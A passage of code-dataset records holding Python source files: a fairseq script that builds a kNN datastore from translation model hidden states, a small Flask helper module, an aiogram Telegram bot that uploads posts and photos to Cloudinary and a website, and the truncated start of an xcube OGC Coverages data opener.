"usage_type": "name"}]} +{"seq_id": "33489269570", "text": "import logging\nimport os\nimport sys\nfrom itertools import chain\n\nimport torch\nfrom fairseq import checkpoint_utils, distributed_utils, options, utils\nfrom fairseq.logging import metrics, progress_bar\nfrom tqdm import tqdm\n\nlogging.basicConfig(\n format=\"%(asctime)s | %(levelname)s | %(name)s | %(message)s\",\n datefmt=\"%Y-%m-%d %H:%M:%S\",\n level=os.environ.get(\"LOGLEVEL\", \"INFO\").upper(),\n stream=sys.stdout,\n)\nlogger = logging.getLogger(\"fairseq_cli.validate\")\n\n\n# ------ add 
by\n# this script is implemented based on validate.py, and refers to the implementation of knnlm\n# we only need to go through the dataset like in training, and save the datastore\n# ------\n\ndef main(args, override_args=None):\n utils.import_user_module(args)\n\n assert (\n args.max_tokens is not None or args.batch_size is not None\n ), \"Must specify batch size either with --max-tokens or --batch-size\"\n\n use_fp16 = args.fp16\n use_cuda = torch.cuda.is_available() and not args.cpu\n\n if use_cuda:\n torch.cuda.set_device(args.device_id)\n\n if override_args is not None:\n overrides = vars(override_args)\n overrides.update(eval(getattr(override_args, \"model_overrides\", \"{}\")))\n else:\n overrides = None\n\n # Load ensemble\n # the task is build based on the checkpoint\n logger.info(\"loading model(s) from {}\".format(args.path))\n models, model_args, task = checkpoint_utils.load_model_ensemble_and_task(\n [args.path],\n arg_overrides=overrides,\n suffix=getattr(args, \"checkpoint_suffix\", \"\"),\n )\n model = models[0]\n\n # Move models to GPU\n for model in models:\n if use_fp16:\n model.half()\n if use_cuda:\n model.cuda()\n\n # print(models[0])\n # exit(0)\n # Print a1rgs\n logger.info(model_args)\n\n # Build criterion, we do not need this, so remove it, by\n # criterion = task.build_criterion(model_args)\n # criterion.eval()\n if args.save_plain_text:\n # we use two lists to save the plain text, where the first list is used to locate the sample (sentence)\n # by index, the second list[dict] contains {start_idx, end_idx, src_tokens, trg_tokens} for each sample\n locate_dict = []\n sentences_array = []\n\n cur_sent_start_idx = 0\n\n try:\n src_dict = getattr(task, \"source_dictionary\", None)\n except NotImplementedError:\n src_dict = None\n tgt_dict = task.target_dictionary\n\n if args.save_source_empty_feature:\n src_dict = getattr(task, \"source_dictionary\", None)\n\n # --- check save data store , add by\n import numpy as np\n if args.dstore_fp16:\n print('Saving fp16')\n dstore_keys = np.memmap(args.dstore_mmap + '/keys.npy', dtype=np.float16, mode='w+',\n shape=(args.dstore_size, args.decoder_embed_dim))\n dstore_vals = np.memmap(args.dstore_mmap + '/vals.npy', dtype=np.int, mode='w+',\n shape=(args.dstore_size, 1))\n else:\n print('Saving fp32')\n dstore_keys = np.memmap(args.dstore_mmap + '/keys.npy', dtype=np.float32, mode='w+',\n shape=(args.dstore_size, args.decoder_embed_dim))\n dstore_vals = np.memmap(args.dstore_mmap + '/vals.npy', dtype=np.int, mode='w+',\n shape=(args.dstore_size, 1))\n\n dstore_idx = 0\n # --- end\n data_idx = 1\n for subset in args.valid_subset.split(\",\"):\n try:\n task.args.required_seq_len_multiple = 1\n task.args.load_alignments = False\n task.load_dataset(subset, combine=False, epoch=data_idx)\n data_idx = data_idx + 1\n dataset = task.dataset(subset)\n except KeyError:\n raise Exception(\"Cannot find dataset: \" + subset)\n\n # Initialize data iterator\n itr = task.get_batch_iterator(\n dataset=dataset,\n max_tokens=args.max_tokens,\n max_sentences=args.batch_size,\n max_positions=utils.resolve_max_positions(\n task.max_positions(),\n *[m.max_positions() for m in models],\n ),\n ignore_invalid_inputs=args.skip_invalid_size_inputs_valid_test,\n required_batch_size_multiple=args.required_batch_size_multiple,\n seed=args.seed,\n num_shards=args.distributed_world_size,\n shard_id=args.distributed_rank,\n num_workers=args.num_workers,\n data_buffer_size=args.data_buffer_size,\n ).next_epoch_itr(False)\n progress = progress_bar.progress_bar(\n 
itr,\n log_format=args.log_format,\n log_interval=args.log_interval,\n prefix=f\"valid on '{subset}' subset\",\n default_log_format=(\"tqdm\" if not args.no_progress_bar else \"simple\"),\n )\n\n log_outputs = []\n with torch.no_grad():\n model.eval()\n for i, sample in enumerate(progress):\n sample = utils.move_to_cuda(sample) if use_cuda else sample\n # print(sample['net_input']['src_tokens'])\n # print(sample['net_input']['prev_output_tokens'])\n # print(sample['target'])\n # exit(0)\n # -------- add by , we should go through the model with the sample and get the hidden state\n # so we append a forward_and_get_hidden_state_step method in Translation task\n # todo, here we want to record the attention information for each token, which maybe too large\n\n if args.save_denoising_feature:\n sample['net_input']['src_tokens'] = sample['net_input']['noisy_target']\n sample['net_input']['src_lengths'] = sample['net_input']['noisy_target_lengths']\n\n if args.save_source_empty_feature:\n src_batch_size = sample['net_input']['src_tokens'].size(0)\n sample['net_input']['src_tokens'] = torch.zeros((src_batch_size, 1)).fill_(src_dict.eos()).to(sample['target'])\n sample['net_input']['src_lengths'] = torch.ones((src_batch_size, 1)).to(sample['target'])\n\n if not args.activate_adapter:\n features, extra = task.forward_and_get_hidden_state_step(sample, model,\n need_self_attn=args.save_attn_weights, )\n # activate_adapter=args.activate_adapter) # [B, T, H]\n else:\n features, extra = task.forward_and_get_hidden_state_step(sample, model,\n need_self_attn=args.save_attn_weights,\n activate_adapter=args.activate_adapter)\n\n cross_attn = extra['attn'][0] # [B, tgt len, src len]\n self_attn = extra['self_attn'] # [B, tgt len. prev tgt len]\n\n source_length = sample['net_input']['src_lengths'] # [B]\n target = sample['target'] # [B, T]\n\n # get useful parameters\n batch_size = target.size(0)\n seq_len = target.size(1)\n pad_idx = task.target_dictionary.pad()\n target_mask = target.ne(pad_idx) # [B, T]\n\n target_length = torch.sum(target_mask, dim=1).int() # [B]\n\n # remove the pad tokens and related hidden states\n target = target.view(batch_size * seq_len)\n target_mask = target_mask.view(batch_size * seq_len)\n\n non_pad_index = target_mask.nonzero().squeeze(-1) # [n_count]\n target = target.index_select(dim=0, index=non_pad_index) # [n_count]\n\n features = features.contiguous().view(batch_size * seq_len, -1)\n features = features.index_select(dim=0, index=non_pad_index) # [n_count, feature size]\n\n # if save plain text\n if args.save_plain_text:\n cur_token_idx = len(locate_dict)\n\n # here, we save the sent index for each token in every sentence, for example\n # target tokens [s1t1, s1t2, s1t3, s2t1, s2t2, s3t1, s3t2, s3t3, s3t4]\n # sent index [0, 0, 0, 1, 1, 2, 2, 2, 2 ]\n\n cur_token_locate = torch.arange(cur_sent_start_idx, cur_sent_start_idx + batch_size).to(\n target.device) # [B]\n cur_token_locate = cur_token_locate.unsqueeze(-1).expand(batch_size, seq_len).reshape(\n batch_size * seq_len) # [B, T_S]\n cur_token_locate = cur_token_locate.index_select(dim=0, index=non_pad_index).tolist() # [n_count]\n locate_dict += cur_token_locate\n cur_sent_start_idx = cur_sent_start_idx + batch_size\n\n for j in range(0, batch_size):\n sentences_array.append(\n {\n 'start_idx': cur_token_idx,\n 'end_idx': cur_token_idx + target_length[j].item() - 1,\n 'len': target_length[j].item(),\n 'src_tokens_id': sample['net_input']['src_tokens'][j],\n 'trg_tokens_id': sample['target'][j],\n 'cross_attn': 
cross_attn[j][:target_length[j],\n :source_length[j]].detach().cpu().numpy().astype(\n np.float16) if args.save_attn_weights else None,\n 'self_attn': self_attn[j][:target_length[j],\n :target_length[j]].detach().cpu().numpy().astype(\n np.float16) if args.save_attn_weights else None,\n }\n )\n\n cur_token_idx = cur_token_idx + target_length[j].item()\n\n # save to the dstore\n current_batch_count = target.size(0)\n if dstore_idx + current_batch_count > args.dstore_size:\n reduce_size = args.dstore_size - dstore_idx\n features = features[:reduce_size]\n target = target[:reduce_size]\n if args.save_plain_text:\n src_tokens = src_tokens[:reduce_size, :]\n else:\n reduce_size = current_batch_count\n\n if args.dstore_fp16:\n dstore_keys[dstore_idx:reduce_size + dstore_idx] = features.detach().cpu().numpy().astype(\n np.float16)\n dstore_vals[dstore_idx:reduce_size + dstore_idx] = target.unsqueeze(-1).cpu().numpy().astype(np.int)\n else:\n dstore_keys[dstore_idx:reduce_size + dstore_idx] = features.detach().cpu().numpy().astype(\n np.float32)\n dstore_vals[dstore_idx:reduce_size + dstore_idx] = target.unsqueeze(-1).cpu().numpy().astype(np.int)\n\n dstore_idx += reduce_size\n\n # print(dstore_idx)\n progress.log({'dstore_size': dstore_idx}, step=i)\n if dstore_idx > args.dstore_size:\n print('much more than dstore size break')\n break\n\n elif dstore_idx == args.dstore_size:\n print('just fill')\n # -------- end, by\n\n print(dstore_idx)\n\n if args.save_plain_text:\n\n for sent_dict in tqdm(sentences_array):\n sent_dict['src_sent'] = src_dict.string(sent_dict['src_tokens_id'], return_list=False,\n extra_symbols_to_ignore=[src_dict.pad()])\n sent_dict['trg_tokens'] = tgt_dict.string(sent_dict['trg_tokens_id'], return_list=True,\n extra_symbols_to_ignore=[tgt_dict.pad()])\n sent_dict['trg_tokens'] = sent_dict['trg_tokens'].split(' ')\n sent_dict['trg_tokens'].append('')\n del sent_dict['src_tokens_id']\n del sent_dict['trg_tokens_id']\n\n print(sentences_array[1000])\n\n with open(args.dstore_mmap + '/text.dstore', 'wb') as f:\n import pickle\n pickle.dump({'locate_dict': locate_dict, 'sent_dict': sentences_array}, f)\n\n\ndef cli_main():\n parser = options.get_save_datastore_parser()\n args = options.parse_args_and_arch(parser)\n\n # only override args that are explicitly given on the command line\n override_parser = options.get_save_datastore_parser()\n override_args = options.parse_args_and_arch(override_parser, suppress_defaults=True)\n\n distributed_utils.call_main(args, main, override_args=override_args)\n\n\nif __name__ == \"__main__\":\n cli_main()\n", "repo_name": "zhengxxn/UDA-KNN", "sub_path": "save_datastore.py", "file_name": "save_datastore.py", "file_ext": "py", "file_size_in_byte": 13042, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.basicConfig", "line_number": 11, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 14, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 15, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 17, "usage_type": "call"}, {"api_name": "fairseq.utils.import_user_module", "line_number": 26, "usage_type": "call"}, {"api_name": "fairseq.utils", "line_number": 26, "usage_type": "name"}, {"api_name": "torch.cuda.is_available", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 33, "usage_type": 
"attribute"}, {"api_name": "torch.cuda.set_device", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 36, "usage_type": "attribute"}, {"api_name": "fairseq.checkpoint_utils.load_model_ensemble_and_task", "line_number": 47, "usage_type": "call"}, {"api_name": "fairseq.checkpoint_utils", "line_number": 47, "usage_type": "name"}, {"api_name": "numpy.memmap", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.float16", "line_number": 90, "usage_type": "attribute"}, {"api_name": "numpy.memmap", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 92, "usage_type": "attribute"}, {"api_name": "numpy.memmap", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 96, "usage_type": "attribute"}, {"api_name": "numpy.memmap", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 98, "usage_type": "attribute"}, {"api_name": "fairseq.utils.resolve_max_positions", "line_number": 119, "usage_type": "call"}, {"api_name": "fairseq.utils", "line_number": 119, "usage_type": "name"}, {"api_name": "fairseq.logging.progress_bar.progress_bar", "line_number": 131, "usage_type": "call"}, {"api_name": "fairseq.logging.progress_bar", "line_number": 131, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 140, "usage_type": "call"}, {"api_name": "fairseq.utils.move_to_cuda", "line_number": 143, "usage_type": "call"}, {"api_name": "fairseq.utils", "line_number": 143, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 158, "usage_type": "call"}, {"api_name": "torch.ones", "line_number": 159, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 182, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.float16", "line_number": 220, "usage_type": "attribute"}, {"api_name": "numpy.float16", "line_number": 223, "usage_type": "attribute"}, {"api_name": "numpy.float16", "line_number": 242, "usage_type": "attribute"}, {"api_name": "numpy.int", "line_number": 243, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 246, "usage_type": "attribute"}, {"api_name": "numpy.int", "line_number": 247, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 265, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 279, "usage_type": "call"}, {"api_name": "fairseq.options.get_save_datastore_parser", "line_number": 283, "usage_type": "call"}, {"api_name": "fairseq.options", "line_number": 283, "usage_type": "name"}, {"api_name": "fairseq.options.parse_args_and_arch", "line_number": 284, "usage_type": "call"}, {"api_name": "fairseq.options", "line_number": 284, "usage_type": "name"}, {"api_name": "fairseq.options.get_save_datastore_parser", "line_number": 287, "usage_type": "call"}, {"api_name": "fairseq.options", "line_number": 287, "usage_type": "name"}, {"api_name": "fairseq.options.parse_args_and_arch", "line_number": 288, "usage_type": "call"}, {"api_name": "fairseq.options", "line_number": 288, "usage_type": "name"}, {"api_name": "fairseq.distributed_utils.call_main", "line_number": 290, "usage_type": "call"}, {"api_name": "fairseq.distributed_utils", "line_number": 290, "usage_type": "name"}]} +{"seq_id": "9285219785", "text": "from datetime import datetime as dt\nfrom datetime import timedelta\nfrom flask import current_app\nimport time\n\n\ndef reformatStringDate(strDate, fromFormat, toFormat):\n datetime_date = dt.strptime(strDate, fromFormat)\n 
str_date = datetime_date.strftime(toFormat)\n return str_date\n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower(\n ) in current_app.config['ALLOWED_EXTENSIONS']\n\n\ndef pad_timestamp(filename):\n name = filename.split('.')\n return name[0] + '_' + str(round(time.time())) + '.' + name[1]\n\n\ndef getAmountFishByType(fishtype, fishlist):\n for obj in fishlist:\n if obj['type'] == fishtype:\n return obj['amount']\n return 0\n\n\ndef getYearToday():\n current_year = dt.today().year\n return str(current_year)\n\ndef getListDateBettwenDate(dateA, dateB):\n # Return list of datetime.date objects (inclusive) between start_date and end_date (inclusive).\n date_list = []\n while dateA < dateB:\n date_list.append(dateA)\n dateA += timedelta(days=1)\n date_list.append(dateA)\n print(date_list)\n return date_list\n", "repo_name": "swasw/AquaBreeding_CustomAPI", "sub_path": "fishapiv4/resources/helper.py", "file_name": "helper.py", "file_ext": "py", "file_size_in_byte": 1139, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datetime.datetime.strptime", "line_number": 8, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 8, "usage_type": "name"}, {"api_name": "flask.current_app.config", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.current_app", "line_number": 16, "usage_type": "name"}, {"api_name": "time.time", "line_number": 21, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 32, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "13974016346", "text": "\r\nfrom aiogram.dispatcher.filters import IDFilter, Command\r\nimport logging\r\nfrom aiogram import Bot, Dispatcher, types\r\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\r\nfrom aiogram.dispatcher import FSMContext, filters\r\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\r\nimport requests\r\nfrom config import *\r\nimport os\r\nimport cloudinary.uploader\r\nimport cloudinary\r\ncloudinary.config(\r\n cloud_name=cloud_name,\r\n api_key=api_key,\r\n api_secret=api_secret\r\n)\r\n\r\n# Инициализация бота и диспетчера\r\nbot = Bot(token=token)\r\nstorage = MemoryStorage()\r\ndp = Dispatcher(bot, storage=storage)\r\n\r\n# Установка уровня логирования\r\nlogging.basicConfig(level=logging.INFO)\r\n\r\nclass NewPostStates(StatesGroup):\r\n waiting_for_title = State() # Ожидание названия\r\n waiting_for_description = State() # Ожидание описания\r\n waiting_for_category = State() # Ожидание категории\r\n waiting_for_photo = State() # Ожидание фото\r\n\r\n\r\n@dp.message_handler(Command('newpost'), IDFilter(user_id=[881704893]))\r\nasync def new_post(message: types.Message):\r\n await message.answer('Введите название поста:')\r\n await NewPostStates.waiting_for_title.set()\r\n\r\n\r\n@dp.message_handler(state=NewPostStates.waiting_for_title)\r\nasync def process_title(message: types.Message, state: FSMContext):\r\n title = message.text\r\n await state.update_data(title=title)\r\n\r\n # Второй запрос - описание поста\r\n await message.answer('Введите описание поста:')\r\n await NewPostStates.waiting_for_description.set()\r\n\r\n# Обработчик ответа на описание поста\r\n@dp.message_handler(state=NewPostStates.waiting_for_description)\r\nasync def process_description(message: types.Message, 
state: FSMContext):\r\n description = message.text\r\n await state.update_data(description=description)\r\n\r\n # Третий запрос - категория поста\r\n await message.answer('Введите категорию поста:')\r\n await NewPostStates.waiting_for_category.set()\r\n\r\n# Обработчик ответа на категорию поста\r\n@dp.message_handler(state=NewPostStates.waiting_for_category)\r\nasync def process_category(message: types.Message, state: FSMContext):\r\n category = message.text\r\n await state.update_data(category=category)\r\n\r\n # Четвертый запрос - фото\r\n await message.answer('Прикрепите фото:')\r\n await NewPostStates.waiting_for_photo.set()\r\n\r\n# Обработчик фото\r\n@dp.message_handler(content_types=['photo'], state=NewPostStates.waiting_for_photo)\r\nasync def process_photo(message: types.Message, state: FSMContext):\r\n # Получаем информацию о фото\r\n photo = message.photo[-1] # Берем последнее (самое большое) фото из списка\r\n\r\n # Сохраняем информацию о фото в состоянии\r\n await state.update_data(photo=photo)\r\n\r\n # Все данные собраны, можно выполнять дальнейшие действия (например, сохранение поста в базу данных)\r\n data = await state.get_data()\r\n # Выводим данные для проверки\r\n \r\n file_id = photo.file_id\r\n file_info = await bot.get_file(file_id)\r\n photo_path = 'static/' + file_info.file_unique_id + '.png'\r\n await photo.download(photo_path)\r\n file = open(photo_path, 'rb')\r\n load = {'file': file}\r\n \r\n\r\n \r\n # Загружаем файл на Cloudinary\r\n result = cloudinary.uploader.upload(file)\r\n \r\n if result:\r\n # Обработка успешного ответа\r\n \r\n secure_url = result['secure_url']\r\n print('Фото успешно загружено:', secure_url)\r\n await message.answer(f\"Пост: {data['title']}\\nОписание: {data['description']}\\nКатегория: {data['category']}\")\r\n json = {'title': data['title'], 'description':data['description'], 'category':data['category'], 'photo_url':secure_url }\r\n url = 'http://balancer-visit-1434470264.eu-north-1.elb.amazonaws.com/newpost'\r\n headers = {'Token': token_access}\r\n requests.post(url=url, json=json, headers=headers)\r\n await message.answer(f'{secure_url}')\r\n else:\r\n # Обработка ошибки\r\n await message.answer('x')\r\n await state.finish()\r\n file.close()\r\n os.remove(photo_path)\r\n\r\nclass NewWorkStates(StatesGroup):\r\n waiting_for_title = State()\r\n waiting_for_content = State()\r\n waiting_for_category = State()\r\n waiting_for_photo = State()\r\n\r\n@dp.message_handler(Command('new_work'), IDFilter(user_id=[881704893]))\r\nasync def new_work(message: types.Message):\r\n await message.answer('Введите название работы:')\r\n await NewWorkStates.waiting_for_title.set()\r\n\r\n@dp.message_handler(state=NewWorkStates.waiting_for_title)\r\nasync def process_title_work(message: types.Message, state: FSMContext):\r\n title = message.text\r\n await state.update_data(title=title)\r\n\r\n # Второй запрос - контент работы\r\n await message.answer('Введите контент работы:')\r\n await NewWorkStates.waiting_for_content.set()\r\n\r\n # Обработчик ответа на контент работы\r\n@dp.message_handler(state=NewWorkStates.waiting_for_content)\r\nasync def process_content_work(message: types.Message, state: FSMContext):\r\n content = message.text\r\n await state.update_data(content=content)\r\n\r\n # Третий запрос - категория работы\r\n await message.answer('Введите категорию работы:')\r\n await NewWorkStates.waiting_for_category.set()\r\n\r\n # Обработчик ответа на категорию работы\r\n@dp.message_handler(state=NewWorkStates.waiting_for_category)\r\nasync def
process_category_work(message: types.Message, state: FSMContext):\r\n category = message.text\r\n await state.update_data(category=category)\r\n\r\n # Четвертый запрос - фото работы\r\n await message.answer('Прикрепите фото работы:')\r\n await NewWorkStates.waiting_for_photo.set()\r\n\r\n # Обработчик фото работы\r\n@dp.message_handler(content_types=['photo'], state=NewWorkStates.waiting_for_photo)\r\nasync def process_photo_work(message: types.Message, state: FSMContext):\r\n # Получаем информацию о фото работы\r\n photo = message.photo[-1]\r\n\r\n # Сохраняем информацию о фото работы в состоянии\r\n await state.update_data(photo=photo)\r\n\r\n # Все данные собраны, можно выполнять дальнейшие действия (например, сохранение работы в базу данных)\r\n data = await state.get_data()\r\n\r\n # Здесь выполните необходимые действия для обработки данных о работе и ее фото\r\n\r\n # Сбрасываем состояние\r\n await state.finish()\r\n\r\n file_id = photo.file_id\r\n file_info = await bot.get_file(file_id)\r\n photo_path = 'static/' + file_info.file_unique_id + '.png'\r\n await photo.download(photo_path)\r\n file = open(photo_path, 'rb')\r\n load = {'file': file}\r\n\r\n # Загружаем файл на Cloudinary\r\n result = cloudinary.uploader.upload(file)\r\n\r\n if result:\r\n # Обработка успешного ответа\r\n\r\n secure_url = result['secure_url']\r\n print('Фото успешно загружено:', secure_url)\r\n await message.answer(f\"Пост: {data['title']}\\nОписание: {data['content']}\\nКатегория: {data['category']}\")\r\n json = {'title': data['title'], 'description': data['content'], 'category': data['category'], 'photo_url': secure_url}\r\n url = 'http://balancer-visit-1434470264.eu-north-1.elb.amazonaws.com/newwork'\r\n headers = {'Token': token_access}\r\n requests.post(url=url, json=json, headers=headers)\r\n await message.answer(f'{secure_url}')\r\n\r\n\r\n\r\n# Запуск бота\r\nif __name__ == '__main__':\r\n from aiogram import executor\r\n executor.start_polling(dp, skip_updates=True)\r\n", "repo_name": "counterat/TelegramBotForBusinesCardWebsite", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 8569, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "cloudinary.config", "line_number": 13, "usage_type": "call"}, {"api_name": "aiogram.Bot", "line_number": 20, "usage_type": "call"}, {"api_name": "aiogram.contrib.fsm_storage.memory.MemoryStorage", "line_number": 21, "usage_type": "call"}, {"api_name": "aiogram.Dispatcher", "line_number": 22, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 25, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 25, "usage_type": "attribute"}, {"api_name": "aiogram.dispatcher.filters.state.StatesGroup", "line_number": 27, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.filters.state.State", "line_number": 28, "usage_type": "call"}, {"api_name": "aiogram.dispatcher.filters.state.State", "line_number": 29, "usage_type": "call"}, {"api_name": "aiogram.dispatcher.filters.state.State", "line_number": 30, "usage_type": "call"}, {"api_name": "aiogram.dispatcher.filters.state.State", "line_number": 31, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 35, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 35, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.filters.Command", "line_number": 34, "usage_type": "call"}, {"api_name": "aiogram.dispatcher.filters.IDFilter", 
"line_number": 34, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 41, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 41, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 41, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 51, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 51, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 51, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 61, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 61, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 61, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 71, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 71, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 71, "usage_type": "name"}, {"api_name": "cloudinary.uploader.upload", "line_number": 92, "usage_type": "call"}, {"api_name": "cloudinary.uploader", "line_number": 92, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 103, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 110, "usage_type": "call"}, {"api_name": "aiogram.dispatcher.filters.state.StatesGroup", "line_number": 112, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.filters.state.State", "line_number": 113, "usage_type": "call"}, {"api_name": "aiogram.dispatcher.filters.state.State", "line_number": 114, "usage_type": "call"}, {"api_name": "aiogram.dispatcher.filters.state.State", "line_number": 115, "usage_type": "call"}, {"api_name": "aiogram.dispatcher.filters.state.State", "line_number": 116, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 119, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 119, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.filters.Command", "line_number": 118, "usage_type": "call"}, {"api_name": "aiogram.dispatcher.filters.IDFilter", "line_number": 118, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 124, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 124, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 124, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 134, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 134, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 134, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 144, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 144, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 144, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 154, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 154, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 154, "usage_type": "name"}, {"api_name": "cloudinary.uploader.upload", "line_number": 177, "usage_type": "call"}, {"api_name": "cloudinary.uploader", "line_number": 177, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 188, "usage_type": "call"}, {"api_name": "aiogram.executor.start_polling", "line_number": 196, "usage_type": "call"}, {"api_name": "aiogram.executor", "line_number": 196, 
"usage_type": "name"}]} +{"seq_id": "20424305478", "text": "import atexit\nimport os\nimport re\nimport shutil\nimport tempfile\nimport datetime\nfrom typing import Any, Container, Collection, Mapping\nfrom typing import Dict\nfrom typing import Iterator\nfrom typing import Optional\nfrom typing import Tuple\nfrom typing import Union\nimport collections.abc\n\nimport dateutil.parser\nimport dateutil.relativedelta\nimport dateutil.rrule\nimport numpy as np\nimport requests\nimport xarray as xr\nimport xcube.core.normalize\nfrom xcube.core.store import DATASET_TYPE\nfrom xcube.core.store import DataDescriptor\nfrom xcube.core.store import DataOpener\nfrom xcube.core.store import DataStore\nfrom xcube.core.store import DataStoreError\nfrom xcube.core.store import DataTypeLike\nfrom xcube.core.store import DatasetDescriptor\nfrom xcube.core.store import DefaultSearchMixin\nfrom xcube.util.jsonschema import JsonBooleanSchema, JsonArraySchema, \\\n JsonNumberSchema, JsonDatetimeSchema\nfrom xcube.util.jsonschema import JsonObjectSchema\nfrom xcube.util.jsonschema import JsonStringSchema\nfrom xcube.util.undefined import UNDEFINED\nfrom xcube_ogccov.constants import OGCCOV_DATA_OPENER_ID\n\n\nclass OGCCovDataOpener(DataOpener):\n \"\"\"A data opener for OGC API - Coverages\"\"\"\n\n def __init__(self, server_url=None):\n \"\"\"Instantiate an OGC API - Coverages data opener.\n\n :param server_url: URL of the API server\n \"\"\"\n\n self._server_url = server_url\n self._normalize_names = True\n self._create_temporary_directory()\n\n def get_open_data_params_schema(self, data_id: Optional[str] = None) -> \\\n JsonObjectSchema:\n self._assert_valid_data_id(data_id, allow_none=True)\n params = dict(\n subset=JsonObjectSchema(), # TODO make the subset schema stricter\n bbox=JsonArraySchema(items=(\n JsonNumberSchema(),\n JsonNumberSchema(),\n JsonNumberSchema(),\n JsonNumberSchema()),\n description='bounding box (min_x, min_y, max_x, max_y)'),\n datetime=JsonArraySchema(),\n properties=JsonArraySchema(\n items=(JsonStringSchema()),\n ),\n scale_factor=JsonNumberSchema(\n description='downscaling factor, applied on each axis'\n ),\n scale_axes=JsonObjectSchema(\n description='mapping from axis name to downscaling factor'\n ),\n scale_size=JsonObjectSchema(\n description='mapping from axis name to desired size'\n ),\n subset_crs=JsonStringSchema(\n description='CRS for the specified subset'\n ),\n bbox_crs=JsonStringSchema(\n description='CRS for the specified bbox'\n ),\n crs=JsonStringSchema(\n description='reproject the output to this CRS'\n )\n )\n return JsonObjectSchema(\n properties=params,\n required=[],\n additional_properties=False\n )\n\n def open_data(self, data_id: str, **open_params) -> xr.Dataset:\n # Unofficial parameters for testing, debugging, etc.\n # They're not in the schema so we remove them before validating.\n read_file_from = open_params.pop('_read_file_from', None)\n save_file_to = open_params.pop('_save_file_to', None)\n save_zarr_to = open_params.pop('_save_zarr_to', None)\n save_request_to = open_params.pop('_save_request_to', None)\n\n schema = self.get_open_data_params_schema(data_id)\n schema.validate_instance(open_params)\n\n # Fill in defaults from the schema\n props = schema.properties\n all_open_params = {k: props[k].default for k in props\n if props[k].default != UNDEFINED}\n all_open_params.update(open_params)\n\n # dataset = self._create_empty_dataset(data_id, all_open_params)\n\n ogc_params = [\n self._convert_store_param(p) for p in all_open_params.items()\n ] + 
